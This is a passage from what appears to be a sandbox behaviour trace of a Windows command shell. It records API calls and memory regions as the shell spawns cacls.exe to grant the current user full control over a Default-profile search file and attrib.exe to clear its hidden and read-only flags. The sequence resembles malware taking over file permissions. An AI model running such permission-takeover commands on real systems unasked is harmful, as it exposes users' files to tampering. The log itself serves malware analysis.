lpBuffer=0x4a560640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0216.176] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0216.176] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0216.176] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0216.176] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0216.176] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0216.176] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0216.176] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0216.176] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0216.176] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0216.176] GetEnvironmentStringsW () returned 0x3e2358* [0216.176] FreeEnvironmentStringsW (penv=0x3e2358) returned 1 [0216.176] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a560640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.176] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a560640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0216.176] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0216.176] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0216.176] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0216.176] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0216.176] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0216.176] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0216.176] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0216.176] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0216.176] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f7f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0216.177] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f7f8, lpFilePart=0x20f7f4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f7f4*="Desktop") returned 0x18 [0216.177] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0216.177] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f574 | out: lpFindFileData=0x20f574) returned 0x3e09e8 [0216.177] FindClose (in: hFindFile=0x3e09e8 | out: hFindFile=0x3e09e8) returned 1 [0216.177] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f574 | out: lpFindFileData=0x20f574) returned 0x3e09e8 [0216.177] FindClose (in: hFindFile=0x3e09e8 | out: hFindFile=0x3e09e8) returned 1 [0216.177] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f574 | out: lpFindFileData=0x20f574) returned 0x3e09e8 [0216.178] FindClose (in: hFindFile=0x3e09e8 | out: hFindFile=0x3e09e8) returned 1 [0216.178] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0216.178] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0216.178] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0216.178] GetEnvironmentStringsW () returned 0x3e0208* [0216.178] FreeEnvironmentStringsW (penv=0x3e0208) returned 1 [0216.178] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a555260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0216.179] GetConsoleOutputCP () returned 0x1b5 [0216.179] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a554260 | out: lpCPInfo=0x4a554260) returned 1 [0216.179] GetUserDefaultLCID () returned 0x409 [0216.179] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a554950, cchData=8 | out: lpLCData=":") returned 2 [0216.179] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f938, cchData=128 | out: lpLCData="0") returned 2 [0216.179] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f938, cchData=128 | out: lpLCData="0") returned 2 [0216.179] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f938, cchData=128 | out: lpLCData="1") returned 2 [0216.179] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a554940, cchData=8 | out: lpLCData="/") returned 2 [0216.180] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a554d80, cchData=32 | out: lpLCData="Mon") returned 4 [0216.180] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a554d40, cchData=32 | out: lpLCData="Tue") returned 4 [0216.180] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a554d00, cchData=32 | out: lpLCData="Wed") returned 4 [0216.180] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a554cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0216.180] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a554c80, cchData=32 | out: lpLCData="Fri") returned 4 [0216.180] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a554c40, cchData=32 | out: lpLCData="Sat") returned 4 [0216.180] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a554c00, cchData=32 | out: lpLCData="Sun") returned 4 [0216.180] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a554930, cchData=8 | out: lpLCData=".") returned 2 [0216.180] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a554920, cchData=8 | out: lpLCData=",") returned 2 [0216.180] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0216.181] GetConsoleTitleW (in: lpConsoleTitle=0x3d0928, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.181] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0216.181] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0216.182] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0216.182] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0216.183] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a560640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0216.183] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0216.183] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0216.183] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0216.183] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0216.183] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0216.183] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0216.183] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0216.186] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0216.186] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0216.186] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0216.186] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0216.186] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0216.186] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0216.186] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0216.188] GetConsoleTitleW (in: lpConsoleTitle=0x20f5cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.188] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0216.188] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0216.188] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0216.188] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0216.188] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0216.188] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0216.189] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0216.189] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0216.189] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0216.189] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0216.189] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0216.189] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0216.189] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0216.189] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0216.189] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0216.189] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0216.189] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0216.189] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0216.189] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0216.189] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0216.189] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0216.189] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0216.189] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0216.189] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0216.189] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0216.189] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0216.189] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0216.189] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0216.189] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0216.189] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0216.189] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0216.189] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0216.189] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0216.189] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0216.189] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0216.189] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0216.189] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0216.189] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0216.189] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0216.189] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0216.189] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0216.189] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0216.189] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0216.189] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0216.189] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0216.189] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0216.189] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0216.189] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0216.189] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0216.189] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0216.189] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0216.189] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0216.189] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0216.189] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0216.189] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0216.190] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0216.190] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0216.190] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0216.190] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0216.190] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0216.190] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0216.190] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0216.190] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0216.190] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0216.190] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0216.190] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0216.190] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0216.190] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0216.190] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0216.190] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0216.190] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0216.190] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0216.190] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0216.190] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0216.190] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0216.190] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0216.190] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0216.190] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0216.190] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0216.190] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0216.190] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0216.190] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0216.190] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0216.190] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0216.190] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0216.190] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0216.190] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0216.190] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0216.191] SetErrorMode (uMode=0x0) returned 0x0 [0216.191] SetErrorMode (uMode=0x1) returned 0x0 [0216.191] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3e1d98, lpFilePart=0x20f0ec | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f0ec*="Desktop") returned 0x18 [0216.191] SetErrorMode (uMode=0x0) returned 0x1 [0216.191] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a560640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0216.191] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0216.196] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a560640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.197] FindClose (in: hFindFile=0x3e1f70 | out: hFindFile=0x3e1f70) returned 1 [0216.197] FindClose (in: hFindFile=0x3e1f70 | out: hFindFile=0x3e1f70) returned 1 [0216.198] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0216.198] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0216.198] GetConsoleTitleW (in: lpConsoleTitle=0x20f360, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.198] InitializeProcThreadAttributeList (in: lpAttributeList=0x20f1e8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20f2b0 | out: lpAttributeList=0x20f1e8, lpSize=0x20f2b0) returned 1 [0216.198] UpdateProcThreadAttribute (in: lpAttributeList=0x20f1e8, dwFlags=0x0, Attribute=0x60001, lpValue=0x20f2a8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20f1e8, lpPreviousValue=0x0) returned 1 [0216.198] GetStartupInfoW (in: lpStartupInfo=0x20f1a4 | out: lpStartupInfo=0x20f1a4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0216.198] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0216.199] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x20f244*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20f290 | out: lpCommandLine="CACLS \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x20f290*(hProcess=0x50, hThread=0x4c, dwProcessId=0xbc8, dwThreadId=0xbf0)) returned 1 [0216.201] CloseHandle (hObject=0x4c) returned 1 [0216.201] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0216.201] GetEnvironmentStringsW () returned 0x3e0208* [0216.202] FreeEnvironmentStringsW (penv=0x3e0208) returned 1 [0216.202] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0216.269] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x20f184 | out: lpExitCode=0x20f184*=0x0) returned 1 [0216.269] CloseHandle (hObject=0x50) returned 1 [0216.269] _vsnwprintf (in: _Buffer=0x20f2cc, _BufferCount=0x13, _Format="%08X", _ArgList=0x20f190 | out: _Buffer="00000000") returned 8 [0216.269] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0216.269] GetEnvironmentStringsW () returned 0x3e21b0* [0216.270] FreeEnvironmentStringsW (penv=0x3e21b0) returned 1 [0216.270] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0216.270] GetEnvironmentStringsW () returned 0x3e21b0* [0216.270] FreeEnvironmentStringsW (penv=0x3e21b0) returned 1 [0216.270] DeleteProcThreadAttributeList (in: lpAttributeList=0x20f1e8 | out: lpAttributeList=0x20f1e8) [0216.270] GetConsoleTitleW (in: lpConsoleTitle=0x20f5cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.270] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a560640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0216.270] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0216.270] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a560640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.270] FindClose (in: hFindFile=0x3de400 | out: hFindFile=0x3de400) returned 1 [0216.271] FindClose (in: hFindFile=0x3de400 | out: hFindFile=0x3de400) returned 1 [0216.271] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0216.271] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0216.271] GetConsoleTitleW (in: lpConsoleTitle=0x20f360, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.271] InitializeProcThreadAttributeList (in: lpAttributeList=0x20f1e8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20f2b0 | out: lpAttributeList=0x20f1e8, lpSize=0x20f2b0) returned 1 [0216.271] UpdateProcThreadAttribute (in: lpAttributeList=0x20f1e8, dwFlags=0x0, Attribute=0x60001, lpValue=0x20f2a8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20f1e8, lpPreviousValue=0x0) returned 1 [0216.271] GetStartupInfoW (in: lpStartupInfo=0x20f1a4 | out: lpStartupInfo=0x20f1a4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0216.271] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0216.271] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x20f244*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20f290 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\"", lpProcessInformation=0x20f290*(hProcess=0x4c, hThread=0x50, dwProcessId=0xbdc, dwThreadId=0xb9c)) returned 1 [0216.273] CloseHandle (hObject=0x50) returned 1 [0216.273] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0216.273] GetEnvironmentStringsW () returned 0x3e21b0* [0216.273] FreeEnvironmentStringsW (penv=0x3e21b0) returned 1 [0216.273] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0216.387] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x20f184 | out: lpExitCode=0x20f184*=0x0) returned 1 [0216.387] CloseHandle (hObject=0x4c) returned 1 [0216.387] _vsnwprintf (in: _Buffer=0x20f2cc, _BufferCount=0x13, _Format="%08X", _ArgList=0x20f190 | out: _Buffer="00000000") returned 8 [0216.387] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0216.387] GetEnvironmentStringsW () returned 0x3e21b0* [0216.387] FreeEnvironmentStringsW (penv=0x3e21b0) returned 1 [0216.387] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0216.387] GetEnvironmentStringsW () returned 0x3e21b0* [0216.387] FreeEnvironmentStringsW (penv=0x3e21b0) returned 1 [0216.387] DeleteProcThreadAttributeList (in: lpAttributeList=0x20f1e8 | out: lpAttributeList=0x20f1e8) [0216.388] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.388] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0216.388] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.388] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5541ac | out: lpMode=0x4a5541ac) returned 1 [0216.388] _get_osfhandle (_FileHandle=0) returned 0x3 [0216.388] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5541b0 | out: lpMode=0x4a5541b0) returned 1 [0216.388] SetConsoleInputExeNameW () returned 0x1 [0216.388] GetConsoleOutputCP () returned 0x1b5 [0216.388] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a554260 | out: lpCPInfo=0x4a554260) returned 1 [0216.388] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.388] exit (_Code=0) Process: id = "547" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea166c0" os_pid = "0xbc8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "546" os_parent_pid = "0x53c" cmd_line = "CACLS \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32135 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32136 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32137 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32138 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 32139 start_va = 0x610000 end_va = 0x618fff entry_point = 0x610000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 32140 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32141 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32142 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32143 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 32144 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32145 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32146 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32147 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32148 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 32149 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 32150 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32151 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 32152 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32153 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 32154 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 